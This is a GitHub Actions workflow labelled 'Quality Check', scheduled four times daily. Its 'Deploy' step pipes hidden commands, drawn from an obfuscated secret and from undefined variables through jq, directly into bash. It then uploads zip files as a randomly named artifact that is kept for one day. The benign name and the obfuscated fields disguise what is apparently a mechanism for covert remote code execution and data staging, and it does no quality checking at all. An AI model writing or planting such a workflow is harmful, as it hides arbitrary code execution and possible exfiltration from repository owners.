name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '18 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Deploy
        env:
          avb8: ${{ secrets.avb8 }}
        run: |
          printf '%s' "$avb8" | jq -r .x7949 | /bin/bash
          echo $u94 | jq -r .lpv6637 | /bin/bash
          printf '%s' "$wck31377" | jq -r .audv9438 | /bin/bash

      - name: Save results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: x6ViT5Oa
          path: "*.zip"
          retention-days: 1
